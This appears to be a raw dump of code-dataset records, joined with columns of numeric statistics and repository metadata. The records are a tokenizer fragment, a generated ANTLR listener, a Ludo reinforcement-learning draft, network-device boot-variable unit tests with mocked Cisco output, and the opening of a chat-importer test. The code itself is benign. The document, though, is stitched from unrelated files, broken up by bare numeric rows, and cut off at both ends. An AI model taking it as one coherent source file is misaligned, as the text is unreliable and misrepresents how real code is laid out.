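    sample = "Results (10,000 rows) are at https://example.org/data, e.g. the R&D set."
    # Prints the split pieces; note that non-empty whitespace gaps between matches
    # survive the `if t` filter, so callers may still want to strip them.
    print(tokenize(sample))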
| 64.866667
| 649
| 0.455293
| 189
| 973
| 2.296296
| 0.322751
| 0.103687
| 0.092166
| 0.080645
| 0.31106
| 0.260369
| 0.221198
| 0.186636
| 0.186636
| 0.145161
| 0
| 0.067797
| 0.090442
| 973
| 15
| 650
| 64.866667
| 0.422599
| 0.204522
| 0
| 0
| 0
| 0.25
| 0.819519
| 0.819519
| 0
| 0
| 0
| 0.066667
| 0
| 1
| 0.25
| false
| 0
| 0.25
| 0
| 0.75
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| null | 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 0
|
0
| 7
|
dab420a0daff73401e49faeedb0fffeb0bd69f00
| 5,490
|
py
|
Python
|
remc/antlr_output/languageListener.py
|
horus-4ever/python-remc
|
1dac312634c9c8f4f60f4f01bdddfac45b34063e
|
[
"MIT"
] | null | null | null |
remc/antlr_output/languageListener.py
|
horus-4ever/python-remc
|
1dac312634c9c8f4f60f4f01bdddfac45b34063e
|
[
"MIT"
] | null | null | null |
remc/antlr_output/languageListener.py
|
horus-4ever/python-remc
|
1dac312634c9c8f4f60f4f01bdddfac45b34063e
|
[
"MIT"
] | null | null | null |
# Generated from language.g4 by ANTLR 4.9.2
from antlr4 import *
if __name__ is not None and "." in __name__:
from .languageParser import languageParser
else:
from languageParser import languageParser
# This class defines a complete listener for a parse tree produced by languageParser.
class languageListener(ParseTreeListener):
# Enter a parse tree produced by languageParser#entry_point.
def enterEntry_point(self, ctx:languageParser.Entry_pointContext):
pass
# Exit a parse tree produced by languageParser#entry_point.
def exitEntry_point(self, ctx:languageParser.Entry_pointContext):
pass
# Enter a parse tree produced by languageParser#extern_declaration.
def enterExtern_declaration(self, ctx:languageParser.Extern_declarationContext):
pass
# Exit a parse tree produced by languageParser#extern_declaration.
def exitExtern_declaration(self, ctx:languageParser.Extern_declarationContext):
pass
# Enter a parse tree produced by languageParser#function_prototype.
def enterFunction_prototype(self, ctx:languageParser.Function_prototypeContext):
pass
# Exit a parse tree produced by languageParser#function_prototype.
def exitFunction_prototype(self, ctx:languageParser.Function_prototypeContext):
pass
# Enter a parse tree produced by languageParser#function_declaration.
def enterFunction_declaration(self, ctx:languageParser.Function_declarationContext):
pass
# Exit a parse tree produced by languageParser#function_declaration.
def exitFunction_declaration(self, ctx:languageParser.Function_declarationContext):
pass
# Enter a parse tree produced by languageParser#kind.
def enterKind(self, ctx:languageParser.KindContext):
pass
# Exit a parse tree produced by languageParser#kind.
def exitKind(self, ctx:languageParser.KindContext):
pass
# Enter a parse tree produced by languageParser#normal_type.
def enterNormal_type(self, ctx:languageParser.Normal_typeContext):
pass
# Exit a parse tree produced by languageParser#normal_type.
def exitNormal_type(self, ctx:languageParser.Normal_typeContext):
pass
# Enter a parse tree produced by languageParser#pointer_type.
def enterPointer_type(self, ctx:languageParser.Pointer_typeContext):
pass
# Exit a parse tree produced by languageParser#pointer_type.
def exitPointer_type(self, ctx:languageParser.Pointer_typeContext):
pass
# Enter a parse tree produced by languageParser#block.
def enterBlock(self, ctx:languageParser.BlockContext):
pass
# Exit a parse tree produced by languageParser#block.
def exitBlock(self, ctx:languageParser.BlockContext):
pass
# Enter a parse tree produced by languageParser#statement.
def enterStatement(self, ctx:languageParser.StatementContext):
pass
# Exit a parse tree produced by languageParser#statement.
def exitStatement(self, ctx:languageParser.StatementContext):
pass
# Enter a parse tree produced by languageParser#expression.
def enterExpression(self, ctx:languageParser.ExpressionContext):
pass
# Exit a parse tree produced by languageParser#expression.
def exitExpression(self, ctx:languageParser.ExpressionContext):
pass
# Enter a parse tree produced by languageParser#function_call.
def enterFunction_call(self, ctx:languageParser.Function_callContext):
pass
# Exit a parse tree produced by languageParser#function_call.
def exitFunction_call(self, ctx:languageParser.Function_callContext):
pass
# Enter a parse tree produced by languageParser#factor.
def enterFactor(self, ctx:languageParser.FactorContext):
pass
# Exit a parse tree produced by languageParser#factor.
def exitFactor(self, ctx:languageParser.FactorContext):
pass
# Enter a parse tree produced by languageParser#non_expression.
def enterNon_expression(self, ctx:languageParser.Non_expressionContext):
pass
# Exit a parse tree produced by languageParser#non_expression.
def exitNon_expression(self, ctx:languageParser.Non_expressionContext):
pass
# Enter a parse tree produced by languageParser#return_statement.
def enterReturn_statement(self, ctx:languageParser.Return_statementContext):
pass
# Exit a parse tree produced by languageParser#return_statement.
def exitReturn_statement(self, ctx:languageParser.Return_statementContext):
pass
# Enter a parse tree produced by languageParser#parameters.
def enterParameters(self, ctx:languageParser.ParametersContext):
pass
# Exit a parse tree produced by languageParser#parameters.
def exitParameters(self, ctx:languageParser.ParametersContext):
pass
# Enter a parse tree produced by languageParser#parameter.
def enterParameter(self, ctx:languageParser.ParameterContext):
pass
# Exit a parse tree produced by languageParser#parameter.
def exitParameter(self, ctx:languageParser.ParameterContext):
pass
# Enter a parse tree produced by languageParser#arguments.
def enterArguments(self, ctx:languageParser.ArgumentsContext):
pass
# Exit a parse tree produced by languageParser#arguments.
def exitArguments(self, ctx:languageParser.ArgumentsContext):
pass
del languageParser
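The generated listener above is only a set of no-op callbacks; the usual pattern is to subclass it, override the callbacks of interest, and drive it with the ANTLR4 runtime's ParseTreeWalker. The sketch below assumes a languageLexer module generated from the same grammar and the flat module layout used in the fallback import branch above; neither is shown in this file.
from antlr4 import InputStream, CommonTokenStream, ParseTreeWalker
from languageLexer import languageLexer      # assumed: generated alongside languageParser
from languageParser import languageParser
from languageListener import languageListener

class FunctionCounter(languageListener):
    """Counts function declarations while the walker visits the tree."""
    def __init__(self):
        self.count = 0

    def enterFunction_declaration(self, ctx):
        self.count += 1

def count_functions(source: str) -> int:
    lexer = languageLexer(InputStream(source))
    parser = languageParser(CommonTokenStream(lexer))
    tree = parser.entry_point()              # entry_point is the grammar's start rule
    counter = FunctionCounter()
    ParseTreeWalker().walk(counter, tree)
    return counter.count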
| 33.272727
| 88
| 0.74827
| 611
| 5,490
| 6.621931
| 0.166939
| 0.051903
| 0.086505
| 0.155709
| 0.843055
| 0.717004
| 0.708601
| 0.533366
| 0.37741
| 0
| 0
| 0.001129
| 0.193078
| 5,490
| 165
| 89
| 33.272727
| 0.91219
| 0.381785
| 0
| 0.453333
| 1
| 0
| 0.000301
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.453333
| false
| 0.453333
| 0.04
| 0
| 0.506667
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 1
| 0
|
0
| 7
|
dad16fe3d479d836846f8a722b5df105ba4cdac5
| 5,839
|
py
|
Python
|
test/drafting.py
|
Larook/DRL_LUDO
|
93e81b45d69de369efd199095bb891aef2c390e7
|
[
"MIT"
] | null | null | null |
test/drafting.py
|
Larook/DRL_LUDO
|
93e81b45d69de369efd199095bb891aef2c390e7
|
[
"MIT"
] | null | null | null |
test/drafting.py
|
Larook/DRL_LUDO
|
93e81b45d69de369efd199095bb891aef2c390e7
|
[
"MIT"
] | null | null | null |
import numpy as np
def get_state_after_action(pieces_player_begin, state_begin, dice, action):
"""
knowing where are current player's pieces and whats the dice and action to take
:return: state of the player after making the move
"""
import config
tile_move_from = pieces_player_begin[action]
state_new = state_begin.copy()
for tile_id, value in enumerate(state_begin):
if tile_id == tile_move_from:
# remove piece from this tile
state_new[tile_id] -= 0.25
# put the piece on the wanted tile
if tile_move_from+dice < config.finished_tile:
state_new[tile_move_from+dice] += 0.25
else:
# if in the safe zone and dice overshoot, take steps back
tile_difference = config.finished_tile - (tile_move_from + dice)
state_new[config.finished_tile - tile_difference] += 0.25
return state_new
# if __name__ == "__main__":
# dice = 6
# begin_state = [1.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,
# 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,
# 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,
# 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,
# 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,
# 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,
# 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.0, 0.0, 0.0, 0.0, 0.0, 0.0,
# 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,
# 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,
# 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,
# 0.5, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.25, 0.25, 0.0, 0.0, 0.0,
# 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,
# 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,
# 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0]
# action = 0
# new_state = [0.75, 0.25, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,0.0, 0.0, 0.0, 0.0, 0.0,0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.5, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.25, 0.25, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,0.0, 0.0, 0.0, 0.0, 0.0]
# pieces_player_begin = [0,0,0,0]
# state_new_check = get_state_after_action(pieces_player_begin, begin_state, dice, action)
def get_enemy_mapped_state(i_enemy, state):
""" need to get values between 0 and 59 - mapped from enemy's state """
mapped_state = []
state = np.array(state) + i_enemy*14
print("state", state)
return mapped_state
def map_enemy_tile_id_to_player_0(i_enemy, tile_id):
""" knowing enemy id and the tile that he sees
check what is the tile in the coordinates of ai player """
tile_ai = i_enemy*13 + tile_id
if tile_ai >= 53:
tile_ai -= 53
tile_ai += 1
if tile_id >= 54:
tile_ai = 0
return tile_ai
def map_tile_id_p0_to_enemy(i_enemy, tile_id_p0_check):
""" p0-1 -> e1-40, e2-27, e3-14
p0-2 -> e2-41, e2-28, e3-15
"""
if tile_id_p0_check == 0:
return 0
tile_enemy = i_enemy*(-13) + tile_id_p0_check
if tile_enemy >= 53:
tile_enemy -= 53
# tile_enemy += 1
if tile_enemy >= 54:
tile_enemy = 0
if tile_enemy < 1:
tile_enemy += 53
tile_enemy -= 1
return tile_enemy
if __name__ == "__main__":
enemy_state = [0.75, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.25, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,0.0, 0.0, 0.0,0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,0.0, 0.0, 0.0,0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,0.0, 0.0, 0.0,0.0, 0.0, 0.0, 0.0, 0.0, 0.0]
# print(len(enemy_state))
# mapped_state = get_enemy_mapped_state(1, enemy_state)
tile_seen_from_enemy = 14
print("tile_seen_from_enemy", tile_seen_from_enemy)
# tile_seen_from_enemy = 54
tile_ai = map_enemy_tile_id_to_player_0(1, tile_seen_from_enemy)
print("tile_ai", tile_ai)
tile_ai = 51
tile_enemy = map_tile_id_p0_to_enemy(i_enemy=1, tile_id_p0_check=tile_ai)
print("tile_enemy", tile_enemy)
| 54.064815
| 1,219
| 0.484843
| 1,499
| 5,839
| 1.784523
| 0.063376
| 0.785794
| 1.164112
| 1.53271
| 0.524112
| 0.501308
| 0.485607
| 0.441495
| 0.404486
| 0.404486
| 0
| 0.281633
| 0.286693
| 5,839
| 107
| 1,220
| 54.570093
| 0.360624
| 0.618942
| 0
| 0
| 0
| 0
| 0.023343
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.083333
| false
| 0
| 0.041667
| 0
| 0.229167
| 0.083333
| 0
| 0
| 1
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
97417176b64fa71141b1dbb19bea04548182f417
| 15,517
|
py
|
Python
|
pkgs/clean-pkg/src/genie/libs/clean/stages/nxos/tests/test_change_boot_variable.py
|
patrickboertje/genielibs
|
61c37aacf3dd0f499944555e4ff940f92f53dacb
|
[
"Apache-2.0"
] | 1
|
2022-01-16T10:00:24.000Z
|
2022-01-16T10:00:24.000Z
|
pkgs/clean-pkg/src/genie/libs/clean/stages/nxos/tests/test_change_boot_variable.py
|
patrickboertje/genielibs
|
61c37aacf3dd0f499944555e4ff940f92f53dacb
|
[
"Apache-2.0"
] | null | null | null |
pkgs/clean-pkg/src/genie/libs/clean/stages/nxos/tests/test_change_boot_variable.py
|
patrickboertje/genielibs
|
61c37aacf3dd0f499944555e4ff940f92f53dacb
|
[
"Apache-2.0"
] | null | null | null |
import logging
import unittest
from unittest.mock import Mock
from genie.libs.clean.stages.nxos.stages import ChangeBootVariable
from genie.libs.clean.stages.tests.utils import CommonStageTests, create_test_device
from pyats.aetest.steps import Steps
from pyats.results import Passed, Failed
from pyats.aetest.signals import TerminateStepSignal
# Disable logging. It may be useful to comment this out when developing tests.
logging.disable(logging.CRITICAL)
class DeleteBootVariable(unittest.TestCase):
def setUp(self):
# Instantiate class object
self.cls = ChangeBootVariable()
# Instantiate device object. This also sets up commonly needed
# attributes and Mock objects associated with the device.
self.device = create_test_device('PE1', os='nxos')
def test_pass(self):
# Make sure we have a unique Steps() object for result verification
steps = Steps()
# And we want the execute_delete_boot_variable api to be mocked so that
# it simulates pass case.
self.device.api.execute_delete_boot_variable = Mock()
# Call the method to be tested (clean step inside class)
self.cls.delete_boot_variable(
steps=steps, device=self.device
)
# Check that the result is expected
self.assertEqual(Passed, steps.details[0].result)
def test_fail_to_delete_boot_variables(self):
# Make sure we have a unique Steps() object for result verification
steps = Steps()
# And we want the execute_delete_boot_variable api to raise an exception when called.
# This simulates the fail case.
self.device.api.execute_delete_boot_variable = Mock(side_effect=Exception)
# We expect this step to fail so make sure it raises the signal
with self.assertRaises(TerminateStepSignal):
self.cls.delete_boot_variable(
steps=steps, device=self.device
)
# Check the overall result is as expected
self.assertEqual(Failed, steps.details[0].result)
class ConfigureBootVariable(unittest.TestCase):
def setUp(self):
self.cls = ChangeBootVariable()
self.device = create_test_device('PE1', os='nxos')
def test_pass(self):
# Make sure we have a unique Steps() object for result verification
steps = Steps()
images = {
'kickstart': 'bootflash:///n3000-uk9-kickstart.6.0.2.U6.10.bin',
'system': 'bootflash:///n3000-uk10.225.0.2.U6.10.bin',
}
# And we want the execute_change_boot_variable api to be mocked.
# This simulates the pass case.
self.device.api.execute_change_boot_variable = Mock()
# Call the method to be tested (clean step inside class)
self.cls.configure_boot_variable(
steps=steps, device=self.device, images=images
)
# Check the overall result is as expected
self.assertEqual(Passed, steps.details[0].result)
def test_pass_current_running_image(self):
data = {
'show version': '''
Cisco Nexus Operating System (NX-OS) Software
TAC support: http://www.cisco.com/tac
Documents: http://www.cisco.com/en/US/products/ps9372/tsd_products_support_series_home.html
Copyright (c) 2002-2017, Cisco Systems, Inc. All rights reserved.
The copyrights to certain works contained herein are owned by
other third parties and are used and distributed under license.
Some parts of this software are covered under the GNU Public
License. A copy of the license is available at
http://www.gnu.org/licenses/gpl.html.
Software
BIOS: version 1.4.0
loader: version N/A
kickstart: version 6.0(2)U6(10)
system: version 6.0(2)U6(10)
Power Sequencer Firmware:
Module 1: version v4.4
BIOS compile time: 12/09/2013
kickstart image file is: bootflash:///n3000-uk9-kickstart.6.0.2.U6.10.bin
kickstart compile time: 3/30/2017 9:00:00 [03/30/2017 19:37:34]
system image file is: bootflash:///n3000-uk10.225.0.2.U6.10.bin
system compile time: 3/30/2017 9:00:00 [03/30/2017 20:04:06]
Hardware
cisco Nexus 3048 Chassis ("48x1GE + 4x10G Supervisor")
Intel(R) Celeron(R) CPU P4505 @ 1.87GHz with 3665288 kB of memory.
Processor Board ID FOC19243WQN
Device name: n3k
bootflash: 2007040 kB
Kernel uptime is 796 day(s), 15 hour(s), 58 minute(s), 29 second(s)
Last reset at 2131 usecs after Thu Jan 18 21:17:51 2018
Reason: Disruptive upgrade
System version: 6.0(2)U6(5b)
Service:
plugin
Core Plugin, Ethernet Plugin
'''
}
# Make sure we have a unique Steps() object for result verification
steps = Steps()
# And we want the execute and execute_change_boot_variable api to be mocked.
# This simulates the pass case.
self.device.execute = Mock(side_effect=lambda x: data[x])
self.device.api.execute_change_boot_variable = Mock()
# Call the method to be tested (clean step inside class)
self.cls.configure_boot_variable(
steps=steps, device=self.device, images=None, current_running_image=True
)
# Check the overall result is as expected
self.assertEqual(Passed, steps.details[0].result)
def test_fail_to_retrieve_current_running_image(self):
data = {
'show version': '''
Cisco Nexus Operating System (NX-OS) Software
TAC support: http://www.cisco.com/tac
Documents: http://www.cisco.com/en/US/products/ps9372/tsd_products_support_series_home.html
Copyright (c) 2002-2017, Cisco Systems, Inc. All rights reserved.
The copyrights to certain works contained herein are owned by
other third parties and are used and distributed under license.
Some parts of this software are covered under the GNU Public
License. A copy of the license is available at
http://www.gnu.org/licenses/gpl.html.
Software
BIOS: version 1.4.0
loader: version N/A
kickstart: version 6.0(2)U6(10)
system: version 6.0(2)U6(10)
Power Sequencer Firmware:
Module 1: version v4.4
BIOS compile time: 12/09/2013
kickstart image file is: bootflash:///n3000-uk9-kickstart.6.0.2.U6.10.bin
kickstart compile time: 3/30/2017 9:00:00 [03/30/2017 19:37:34]
system image file is: bootflash:///n3000-uk10.225.0.2.U6.10.bin
system compile time: 3/30/2017 9:00:00 [03/30/2017 20:04:06]
Hardware
cisco Nexus 3048 Chassis ("48x1GE + 4x10G Supervisor")
Intel(R) Celeron(R) CPU P4505 @ 1.87GHz with 3665288 kB of memory.
Processor Board ID FOC19243WQN
Device name: n3k
bootflash: 2007040 kB
Kernel uptime is 796 day(s), 15 hour(s), 58 minute(s), 29 second(s)
Last reset at 2131 usecs after Thu Jan 18 21:17:51 2018
Reason: Disruptive upgrade
System version: 6.0(2)U6(5b)
Service:
plugin
Core Plugin, Ethernet Plugin
'''
}
# Make sure we have a unique Steps() object for result verification
steps = Steps()
# And we want the execute and execute_change_boot_variable api to be mocked.
# This simulates the fail case.
self.device.execute = Mock(side_effect=lambda x: data[x])
self.device.api.execute_change_boot_variable = Mock(side_effect=Exception)
# Call the method to be tested (clean step inside class)
with self.assertRaises(TerminateStepSignal):
self.cls.configure_boot_variable(
steps=steps, device=self.device, images=None, current_running_image=True
)
# Check the overall result is as expected
self.assertEqual(Failed, steps.details[0].result)
def test_fail_to_configure_boot_variable(self):
# Make sure we have a unique Steps() object for result verification
steps = Steps()
images = {
'kickstart': 'bootflash:///n3000-uk9-kickstart.6.0.2.U6.10.bin',
'system': 'bootflash:///n3000-uk10.225.0.2.U6.10.bin',
}
# And we want the execute_change_boot_variable api to raise an exception when called.
# This simulates the fail case.
self.device.api.execute_change_boot_variable = Mock(side_effect=Exception)
# Call the method to be tested (clean step inside class)
with self.assertRaises(TerminateStepSignal):
self.cls.configure_boot_variable(
steps=steps, device=self.device, images=images
)
# Check the overall result is as expected
self.assertEqual(Failed, steps.details[0].result)
class SaveRunningConfig(unittest.TestCase):
def setUp(self):
self.cls = ChangeBootVariable()
self.device = create_test_device('PE1', os='nxos')
def test_pass(self):
# Make sure we have a unique Steps() object for result verification
steps = Steps()
# And we want the execute_copy_run_to_start api to be mocked.
# This simulates the pass case.
self.device.api.execute_copy_run_to_start = Mock()
# Call the method to be tested (clean step inside class)
self.cls.save_running_config(
steps=steps, device=self.device
)
# Check the overall result is as expected
self.assertEqual(Passed, steps.details[0].result)
def test_fail_to_save_running_config(self):
# Make sure we have a unique Steps() object for result verification
steps = Steps()
# And we want the execute_copy_run_to_start api to raise an exception when called.
# This simulates the fail case.
self.device.api.execute_copy_run_to_start = Mock(side_effect=Exception)
# Call the method to be tested (clean step inside class)
with self.assertRaises(TerminateStepSignal):
self.cls.save_running_config(
steps=steps, device=self.device
)
# Check the overall result is as expected
self.assertEqual(Failed, steps.details[0].result)
class VerifyBootVariable(unittest.TestCase):
def setUp(self):
self.cls = ChangeBootVariable()
self.device = create_test_device('PE1', os='nxos')
def test_pass(self):
# Make sure we have a unique Steps() object for result verification
steps = Steps()
images = {
'kickstart': ['slot0:/n7000-s2-kickstart.8.3.0.CV.0.658.gbin'],
'system': ['slot0:/n7000-s2-dk10.34.3.0.CV.0.658.gbin']
}
data = {
'show boot': '''
Current Boot Variables:
sup-1
kickstart variable = slot0:/n7000-s2-kickstart.8.3.0.CV.0.658.gbin
system variable = slot0:/n7000-s2-dk10.34.3.0.CV.0.658.gbin
Boot POAP Disabled
sup-2
kickstart variable = slot0:/n7000-s2-kickstart.8.3.0.CV.0.658.gbin
system variable = slot0:/n7000-s2-dk10.34.3.0.CV.0.658.gbin
Boot POAP Disabled
No module boot variable set
Boot Variables on next reload:
sup-1
kickstart variable = slot0:/n7000-s2-kickstart.8.3.0.CV.0.658.gbin
system variable = slot0:/n7000-s2-dk10.34.3.0.CV.0.658.gbin
Boot POAP Disabled
sup-2
kickstart variable = slot0:/n7000-s2-kickstart.8.3.0.CV.0.658.gbin
system variable = slot0:/n7000-s2-dk10.34.3.0.CV.0.658.gbin
Boot POAP Disabled
No module boot variable set
'''
}
steps = Steps()
# And we want the execute method to be mocked with device console output.
self.device.execute = Mock(side_effect=lambda x: data[x])
# Call the method to be tested (clean step inside class)
self.cls.verify_boot_variable(
steps=steps, device=self.device, images=images
)
# Check the overall result is as expected
self.assertEqual(Passed, steps.details[0].result)
def test_fail_to_verify_boot_variable(self):
# Make sure we have a unique Steps() object for result verification
steps = Steps()
images = {
'kickstart': ['slot0:/n7000-s2-kickstart.8.3.0.CV.0.658.gbin'],
'system': ['slot0:/n7000-s2-dk10.34.3.0.CV.0.658.gbin']
}
# And we want the execute method to be mocked with device console output.
self.device.api.is_next_reload_boot_variable_as_expected = Mock(side_effect=Exception)
# Call the method to be tested (clean step inside class)
with self.assertRaises(TerminateStepSignal):
self.cls.verify_boot_variable(
steps=steps, device=self.device, images=images
)
# Check the overall result is as expected
self.assertEqual(Failed, steps.details[0].result)
class VerifyHaFileTransfer(unittest.TestCase):
def setUp(self):
self.cls = ChangeBootVariable()
self.device = create_test_device('PE1', os='nxos')
self.device.is_ha = True
def test_pass(self):
# Make sure we have a unique Steps() object for result verification
steps = Steps()
# And we want the execute method to be mocked with device console output.
self.device.execute = Mock(return_value='No file currently being auto-copied')
# Call the method to be tested (clean step inside class)
self.cls.verify_ha_file_transfer(
steps=steps, device=self.device
)
# Check the overall result is as expected
self.assertEqual(Passed, steps.details[0].result)
def test_fail_to_verify_ha_file_transfer(self):
# Make sure we have a unique Steps() object for result verification
steps = Steps()
max_time = 0
check_interval = 0
# And we want the execute method to be mocked with device console output.
self.device.execute = Mock(return_value='Auto-Copy on standby is not yet completed')
# Call the method to be tested (clean step inside class)
with self.assertRaises(TerminateStepSignal):
self.cls.verify_ha_file_transfer(
steps=steps, device=self.device, standby_copy_max_time=max_time,
standby_copy_check_interval=check_interval
)
# Check the overall result is as expected
self.assertEqual(Failed, steps.details[0].result)
| 38.503722
| 107
| 0.612232
| 1,998
| 15,517
| 4.66967
| 0.153654
| 0.034298
| 0.016077
| 0.018006
| 0.893462
| 0.885316
| 0.877814
| 0.877385
| 0.875991
| 0.870418
| 0
| 0.056774
| 0.306438
| 15,517
| 402
| 108
| 38.599502
| 0.810165
| 0.211574
| 0
| 0.772727
| 0
| 0.099174
| 0.462088
| 0.071634
| 0
| 0
| 0
| 0
| 0.07438
| 1
| 0.070248
| false
| 0.053719
| 0.033058
| 0
| 0.123967
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 8
|
97832efe7b0fee4fd8933fb98d2180c0c04aec7c
| 28,178
|
py
|
Python
|
tests/test_load_jchat.py
|
debrief/pepys-import
|
12d29c0e0f69e1119400334983947893e7679b6b
|
[
"Apache-2.0"
] | 4
|
2021-05-14T08:22:47.000Z
|
2022-02-04T19:48:25.000Z
|
tests/test_load_jchat.py
|
debrief/pepys-import
|
12d29c0e0f69e1119400334983947893e7679b6b
|
[
"Apache-2.0"
] | 1,083
|
2019-11-06T17:01:07.000Z
|
2022-03-25T10:26:51.000Z
|
tests/test_load_jchat.py
|
debrief/pepys-import
|
12d29c0e0f69e1119400334983947893e7679b6b
|
[
"Apache-2.0"
] | 4
|
2019-11-06T12:00:45.000Z
|
2021-06-09T04:18:28.000Z
|
import os
import unicodedata
import unittest
from datetime import datetime
from importers.jchat_importer import JChatImporter
from pepys_import.core.store.data_store import DataStore
from pepys_import.file.file_processor import FileProcessor
from tests.utils import check_errors_for_file_contents
FILE_PATH = os.path.dirname(__file__)
NO_EXT_PATH = os.path.join(FILE_PATH, "sample_data/jchat_files/jchat_no_ext")
BREAKS_PATH = os.path.join(FILE_PATH, "sample_data/jchat_files/jchat_breaks_in_message.html")
DATA_PATH = os.path.join(FILE_PATH, "sample_data/jchat_files/jchat_sample.html")
UNUSUAL_CHARS_PATH = os.path.join(FILE_PATH, "sample_data/jchat_files/jchat_unusual_chars.html")
MARKER_MESSAGES_PATH = os.path.join(FILE_PATH, "sample_data/jchat_files/marker_messages.html")
ROOM_MESSAGES_PATH = os.path.join(FILE_PATH, "sample_data/jchat_files/connect_disconnect.html")
NO_HTML_EXT_DOT_IN_NAME_PATH = os.path.join(FILE_PATH, "sample_data/jchat_files/ABC_123.01_XYZ")
